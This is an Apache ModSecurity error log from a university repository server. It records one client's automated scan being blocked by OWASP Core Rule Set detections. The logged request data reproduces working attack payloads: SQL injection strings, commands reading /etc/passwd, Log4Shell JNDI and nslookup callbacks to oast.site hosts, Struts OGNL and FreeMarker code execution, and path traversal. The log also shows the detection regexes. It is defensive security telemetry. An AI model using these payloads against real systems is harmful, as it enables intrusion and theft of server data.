[Tue Aug 29 11:31:57.325278 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vcCo-f0AAAQNwK4AAAAv"]
[Tue Aug 29 11:31:58.303384 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQR494AAAAz"]
[Tue Aug 29 11:31:58.375959 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vsCo-f0AAAQNwLUAAAAv"]
[Tue Aug 29 11:31:59.316653 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAAP5mNYAAAAM"]
[Tue Aug 29 11:31:59.342856 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgdo8bgehgzrysr.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQOv5IAAAAw"]
[Tue Aug 29 11:31:59.347315 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10v8Co-f0AAAPDoA4AAAAP"]
[Tue Aug 29 11:32:04.411684 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQOv6QAAAAw"]
[Tue Aug 29 11:32:06.393509 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAQR4-UAAAAz"]
[Tue Aug 29 11:32:06.481293 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAPiBpwAAAAB"]
[Tue Aug 29 11:32:07.324684 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAQv1lMAAAAA"]
[Tue Aug 29 11:32:08.304125 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAPiBqIAAAAB"]
[Tue Aug 29 11:32:08.321676 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQv1lUAAAAA"]
[Tue Aug 29 11:32:10.347488 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgrm7f7x4skjc9g.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQ83QkAAAAI"]
[Tue Aug 29 11:32:10.432517 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg5i8qrgtjakmti.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQUIB0AAAA2"]
[Tue Aug 29 11:32:12.339633 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAN9sTUAAAAJ"]
[Tue Aug 29 11:32:13.312290 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAP8G4gAAAAV"]
[Tue Aug 29 11:32:13.338204 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg5fpko4d1ouaw4.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg5fpko4d1ouaw4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAP5mPwAAAAM"]
[Tue Aug 29 11:32:15.312876 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQUICwAAAA2"]
[Tue Aug 29 11:32:15.372115 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQUIC8AAAA2"]
[Tue Aug 29 11:32:16.360706 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQOv8AAAAAw"]
[Tue Aug 29 11:32:16.383688 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repository.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQUIDYAAAA2"]
[Tue Aug 29 11:32:16.383723 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQUIDYAAAA2"]
[Tue Aug 29 11:32:17.377716 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAANWgZQAAAAG"]
[Tue Aug 29 11:32:18.390263 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAPiBq4AAAAB"]
[Tue Aug 29 11:32:18.392099 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQnF@EAAAAF"]
[Tue Aug 29 11:32:21.385488 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQnF@0AAAAF"]
[Tue Aug 29 11:32:21.422817 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQnF@4AAAAF"]
[Tue Aug 29 11:32:22.402639 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAARD1NUAAAAH"]
[Tue Aug 29 11:32:23.311409 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAARD1NsAAAAH"]
[Tue Aug 29 11:32:23.316590 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAANWgaIAAAAG"]
[Tue Aug 29 11:32:25.313607 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAPxBYYAAAAS"]
[Tue Aug 29 11:32:25.319278 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAANwNzkAAAAb"]
[Tue Aug 29 11:32:28.003033 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAQnGAYAAAAF"]
[Tue Aug 29 11:32:28.470497 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANWgbcAAAAG"]
